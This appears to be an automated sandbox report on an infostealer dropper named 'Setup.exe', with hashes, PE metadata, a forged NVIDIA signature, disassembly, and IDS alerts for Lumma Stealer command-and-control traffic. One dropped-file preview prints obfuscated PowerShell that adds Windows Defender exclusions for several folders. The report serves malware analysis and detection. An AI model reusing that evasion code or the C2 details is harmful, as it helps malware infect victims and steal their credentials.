                                                                                                                                      SHA-512:5AF47CBAE0C47FACFD055221E3EF1468A7F4535BC573236687BE117C2690F6DCF764491DEB43CB0A0CD25F4222CC657EC1039A800B55831DF199E30DF70FE11A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..j..N....o.@..z.>/.P9N.".........T..1.....D.$....ZF.rb........Q..7.......Je....p.=fb....q......~.....L.1..F........co.|1|.r.$.].8...a..u.ub_...8....iJUs.#....c...B.y.......n"..KKq..V.>>.h...Q~kcF..oo.N..zl. .o...~.;...K.CV.....`A5.O..*H.K..c...[2....P$|..4....}..Tw..I...}.0...XR]..2...U*..S..A#.N.r......0K...b@...W.U.kv..n......t.Z./.+n.5../...T........P..[.hX._Y.9'.)iaA.S?..U..[.h.....!].%TXA.....=..L..T.A........*`.H........!..u...2..QF...0G.-.......1..V. .?...S.W.Fm(k..?-B..'.])5.?O:......X?...*...*-FX].[..x#.X....HV.i..:..F...........h...4...j.T.az.5L..qo.".\."...:.{..<.S.......a...p.....q$.....q.2^.f......w`.....l.?......@..9....R..`..6n.........2.(.<..N}.hu.q-;.xTM.;..J. .....~.."....-.....BR..EF...T\Tb..h........bD.....P....?.Z8..pM...3F........-.&]B.N.....)Gn...M....f...N"0L..XZ........U|...C..5.3.h9...L..c......Ei.M.}..=l.r..}U..........U..iFZMA....v...y4J##....... Ko.u.9.0...5...#l.K...].....".#.....;....6U..%.9......@.
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76800
                                                                                                                                      Entropy (8bit):7.9975070062640174
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:FC8zEjXAuACtZBqGv4Q63QLT9v9h5rptdt9xZNIpU60yshHW5Gth0hES:FC8zitACjN4Q63QLTtdrFt9xDIqVyA7g
                                                                                                                                      MD5:9BFE72521C1644D8B185D255E44A8B54
                                                                                                                                      SHA1:F976B6B3FDECBABE01B55D2828712FD8FB121F25
                                                                                                                                      SHA-256:8B9306D6DA01DA87779DE0F9D6E935BEA94BDD2992DECCC2790200173EE6DD3D
                                                                                                                                      SHA-512:5272B5C25F8FCE9354EA107CE1714ADE0AD4C122E8E5ED3FBE475EFD5E981AB918BD5E00A6E7E35FA87C6ECC60D0C1655B3BE3E4AF745087C64F4E34FD566876
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.=N.~.%._.*s...>...v...TR....e.C.....~"&N]G-..x.=.~l..|.A..$-........H.....t#.[..0......'z.&..df.6.m.......s...*k .H.^...gx......1.....hu..H..*...m...A.........A-].P....3@"... =..s.....|.........p.U...F...e...7......Q;.}.%....#3h*...g.R....|h.\...]#.f..c4k...8.p..OGC8:.....h...veje..V..}.p."L.P....S...a...h.......n..j.u[..{..uD..=..e...G.....d#.d...V...o.2rw,/.2.d.8.&.o...M?..p...w..1..+L..g...J...W^.%53U........X,(........E6>...`..g.K..5....._.....Fn..X5.(.....\(.0p.oPF..&..*/.l..n|....W.I.3.v...f.3n...`'.m..}...{..A.........oNaeP.b..{..W...`.1*.......F.}.p..T.y...> .7j..<c.i...O)A..t.Lde...-Y.D-.....W......k.....[...s.i.P.....b.\.I..9SX...%.r<...........%G.?..(!...=.}.%S)H.M.#....|.....>xl...B.1p/|....8....8.m...[...r...+.....s......bh..+.y...\....,...h...!-..B%.2.....k#...v...j].9.....:X.@..F..3....1.0..O<.!..^....c..kK..-..#.{j@.R=,N.9hm7.$......n.1jld.'[P....,.Vj.vW.....b..-...p.I......G..A.8;..y0.x?..#..P...;..J./....b..G.vH
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:COM executable for DOS
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):893607
                                                                                                                                      Entropy (8bit):6.6202539280413335
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:0pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:0T3E53Myyzl0hMf1te7xaA8M0L
                                                                                                                                      MD5:508DD472A89794E64AD5EEB315F9939D
                                                                                                                                      SHA1:FCC1C958D5624BC06AA741D7DDBBCB519521D2E3
                                                                                                                                      SHA-256:EF279E2EEF2F3F56EBAC738D3EAC31CA1EE46A201998BFE941CCB940B947C221
                                                                                                                                      SHA-512:884019D1FA05C22F8056BA0CFCE3505102DCA9A3E97982AA1219070B3A900CDAA8C20805C42679C904BAC5BD2994471AF8C863A1C76597406C66F50CB569B48D
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:Z......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\Desktop\'Setup.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):58368
                                                                                                                                      Entropy (8bit):7.996670641656827
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:3vHkVbuKTAScfh9uL+5H5aILCMbQBRZ+IV4mKh:vkV3sScfh94I59L3kDYY4/
                                                                                                                                      MD5:6E266F7D1CE6DE046D338658EA61C1F8
                                                                                                                                      SHA1:A413F884534AE8EEFD131BF6918EC03AB8A863DC
                                                                                                                                      SHA-256:4884CB6483D184B09E89A2A6912E7FF3046F428FB1AEB1332D31D110C64ABB09
                                                                                                                                      SHA-512:BFB704CD2D16DA650D906F812C2052F51301CA4B2E3A98F0DCA8E9811D7EB371205DBC5655D858331779BBEAE9D09ADCE8BDA1228C39F4731F791D4C346103AC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:q.....v~.-Oj..*g{.....I....o..o.6.H..$...e.z=%..v.D[.Y.K.y..PB5..d.F....&.Z.<h.;.*..'?.;Q"..v@u.:8.'SB.P%..)...0.Y.a...OI......f7...z... }.8.l5.+..4...'......j...7..%......f~.......@o3..............{.@#....2...S..p.d.....w{.9r.J...XZ..-K..g..[.P..~v.o........l.h....._..q....M....uy\U..[.......u.N:.n....dV...u{z.%)Z|>.X.B...V..d.P#7qUO.x%... })d..hYEN.%h.o.;.....7...a.R...."...n.O8.U.E`...@.m}1......=!.....?.Yh.j ....*V..m..e...........W.........."k....R}..A.-.v.]..2).b.\.~ai.Y.../.9.,^...*q.2U..G#(.A.az..v...._.&..*..w.o.k..........zyQ..k../n.'gB:/.{.......;GT..#%M..#zZU.v&..g...9.......F.....i...`.Q|..g.J.Wr..5'...y&IU\......B`<.....K.)....Q...:$.:PT.,..{o.....\..%..Z..*...~........4.....<..Y.|.n..v>.....z.n.=...e...FZ.......M...A../t."E...\-W.....1F..I.b.n#....m......?.....Y.,06.4...p7[.w..%...o.........J.W.d.>K......a.QQ8.Z.H/qm......B..u.ye...+...E.-..=n...\CFS...4.T.5I.U.....I.(v..I...<...8.,.a.R.......v.rP.X.;o.....?..J.@.....A..?.(
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\108941\Contrast.com
                                                                                                                                      File Type:ASCII text, with very long lines (619), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):619
                                                                                                                                      Entropy (8bit):5.708869778857825
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:z/ubfzLgyaI4vY8lRzLgyaI4HYF+SLknpHi3t1O+FrAcZYWnefxo0zLgyaIS1+/:z/uLzLCQezLCHYdLknxMt17AqYWefxnN
                                                                                                                                      MD5:909DABB4B6591DDCBE2DF0395650DCCA
                                                                                                                                      SHA1:51FDEF10C5AADD9DA387464A016223CE1FEF0F1D
                                                                                                                                      SHA-256:2A29C9904D1860EA3177DA7553C8B1BF1944566E5BC1E71340D9E0FF079F0BD3
                                                                                                                                      SHA-512:E97C71230052E8E24AFA4E0030E45D3CC3473ABECEB1B08BD2C1C8CEFC0F97A7591F831C5E1A82F2E8836BAC6FD06EFBA8314AECD539ACB1CA06C46893793323
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:$m3x8yk2j5q7="Add-MpPreference -ExclusionPath ";$a1k9zs7d6fh=[System.Text.Encoding]::ASCII.GetBytes("UniqueString1");$w2fh6zk3l9jy=($m3x8yk2j5q7+"'$env:TEMP'");$p9lk7zd5j3x=[System.Text.Encoding]::ASCII.GetString($a1k9zs7d6fh);$v4jk8x7l2fh=($m3x8yk2j5q7+"'$env:APPDATA'");$b0zl6kj8x3d=New-Object System.Text.ASCIIEncoding;$x5jh9y2k7zl=($m3x8yk2j5q7+"'C:\ProgramData'");$n7fh5x2j8lk=$b0zl6kj8x3d.GetBytes("UniqueString2");iex $w2fh6zk3l9jy;iex $v4jk8x7l2fh;iex $x5jh9y2k7zl;$j3yk9zl7f5h=[System.Diagnostics.Process]::GetCurrentProcess().CloseMainWindow();$c6zk8fj2yl9=[System.Text.Encoding]::UTF8.GetString($n7fh5x2j8lk)
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.974730718381986
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:'Setup.exe
                                                                                                                                      File size:1'076'464 bytes
                                                                                                                                      MD5:b00b38068b134113eb53676c33a59a93
                                                                                                                                      SHA1:91a7780b1e6e8600c119abe8b49412bc4234751b
                                                                                                                                      SHA256:5a4692e821ef88f689144312c8f273d7e1599d44e8a26952ff7b9f62c4138f02
                                                                                                                                      SHA512:d1f0909d235f44246882387d2f63ed484aacf4e5a5eb0b131edf662d426a04325a5a8baae0d2a11d5209ca7198416f40e15c27db112f5c2441c0778a7c347d06
                                                                                                                                      SSDEEP:24576:6Owg7Li0laDR3EkuSWHb4rQ6se2hatUdto8cSrUsC:hfq0laDR3EkvmWsdzPcSI
                                                                                                                                      TLSH:9C3533832A9D1A36EC5D8D3227B10D766CBFF46135A18A6F72508553EFC1288BD5C723
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...X...B...8.....
                                                                                                                                      Icon Hash:71e0acc1d2caf818
                                                                                                                                      Entrypoint:0x4038af
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:true
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:5
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:5
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:5
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                      Signature Valid:false
                                                                                                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                      Error Number:-2146869232
                                                                                                                                      Not Before, Not After
                                                                                                                                      • 12/01/2023 19:00:00 16/01/2026 18:59:59
                                                                                                                                      Subject Chain
                                                                                                                                      • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                                                      Version:3
                                                                                                                                      Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                                                      Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                                                      Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                                                      Serial:0997C56CAA59055394D9A9CDB8BEEB56
                                                                                                                                      Instruction
                                                                                                                                      sub esp, 000002D4h
                                                                                                                                      push ebx
                                                                                                                                      push ebp
                                                                                                                                      push esi
                                                                                                                                      push edi
                                                                                                                                      push 00000020h
                                                                                                                                      xor ebp, ebp
                                                                                                                                      pop esi
                                                                                                                                      mov dword ptr [esp+18h], ebp
                                                                                                                                      mov dword ptr [esp+10h], 0040A268h
                                                                                                                                      mov dword ptr [esp+14h], ebp
                                                                                                                                      call dword ptr [00409030h]
                                                                                                                                      push 00008001h
                                                                                                                                      call dword ptr [004090B4h]
                                                                                                                                      push ebp
                                                                                                                                      call dword ptr [004092C0h]
                                                                                                                                      push 00000008h
                                                                                                                                      mov dword ptr [0047EB98h], eax
                                                                                                                                      call 00007FF5B4B29A6Bh
                                                                                                                                      push ebp
                                                                                                                                      push 000002B4h
                                                                                                                                      mov dword ptr [0047EAB0h], eax
                                                                                                                                      lea eax, dword ptr [esp+38h]
                                                                                                                                      push eax
                                                                                                                                      push ebp
                                                                                                                                      push 0040A264h
                                                                                                                                      call dword ptr [00409184h]
                                                                                                                                      push 0040A24Ch
                                                                                                                                      push 00476AA0h
                                                                                                                                      call 00007FF5B4B2974Dh
                                                                                                                                      call dword ptr [004090B0h]
                                                                                                                                      push eax
                                                                                                                                      mov edi, 004CF0A0h
                                                                                                                                      push edi
                                                                                                                                      call 00007FF5B4B2973Bh
                                                                                                                                      push ebp
                                                                                                                                      call dword ptr [00409134h]
                                                                                                                                      cmp word ptr [004CF0A0h], 0022h
                                                                                                                                      mov dword ptr [0047EAB8h], eax
                                                                                                                                      mov eax, edi
                                                                                                                                      jne 00007FF5B4B2703Ah
                                                                                                                                      push 00000022h
                                                                                                                                      pop esi
                                                                                                                                      mov eax, 004CF0A2h
                                                                                                                                      push esi
                                                                                                                                      push eax
                                                                                                                                      call 00007FF5B4B29411h
                                                                                                                                      push eax
                                                                                                                                      call dword ptr [00409260h]
                                                                                                                                      mov esi, eax
                                                                                                                                      mov dword ptr [esp+1Ch], esi
                                                                                                                                      jmp 00007FF5B4B270C3h
                                                                                                                                      push 00000020h
                                                                                                                                      pop ebx
                                                                                                                                      cmp ax, bx
                                                                                                                                      jne 00007FF5B4B2703Ah
                                                                                                                                      add esi, 02h
                                                                                                                                      cmp word ptr [esi], bx
                                                                                                                                      Programming Language:
                                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                      • [ C ] VS2010 SP1 build 40219
                                                                                                                                      • [RES] VS2010 SP1 build 40219
                                                                                                                                      • [LNK] VS2010 SP1 build 40219
                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000xe66e.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x1046c80x2628.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .rsrc0x1000000xe66e0xe8007f2c69839a8806dd58af4dece8b3703eFalse0.9127828663793104data7.6649981349228025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .reloc0x10f0000xfd60x1000e41970182a891ebf16d86470af3ecf01False0.597900390625data5.583890657569535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                      RT_ICON0x1002200x8ac2PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0005911829288892
                                                                                                                                      RT_ICON0x108ce40x2928PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001044039483675
                                                                                                                                      RT_ICON0x10b60c0x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.616253051261188
                                                                                                                                      RT_ICON0x10dc740x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7562056737588653
                                                                                                                                      RT_DIALOG0x10e0dc0x100dataEnglishUnited States0.5234375
                                                                                                                                      RT_DIALOG0x10e1dc0x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                      RT_DIALOG0x10e2f80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                      RT_GROUP_ICON0x10e3580x3edataEnglishUnited States0.8225806451612904
                                                                                                                                      RT_MANIFEST0x10e3980x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                                                                      DLLImport
                                                                                                                                      KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                      USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                      SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                      ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                      VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                      EnglishUnited States
                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                      2024-11-29T15:12:37.057575+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549754104.21.63.229443TCP
                                                                                                                                      2024-11-29T15:12:39.594075+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549754104.21.63.229443TCP
                                                                                                                                      2024-11-29T15:12:39.594075+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549754104.21.63.229443TCP
                                                                                                                                      2024-11-29T15:12:40.949212+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549764104.21.63.229443TCP
                                                                                                                                      2024-11-29T15:12:43.897693+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549764104.21.63.229443TCP
                                                                                                                                      2024-11-29T15:12:43.897693+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549764104.21.63.229443TCP
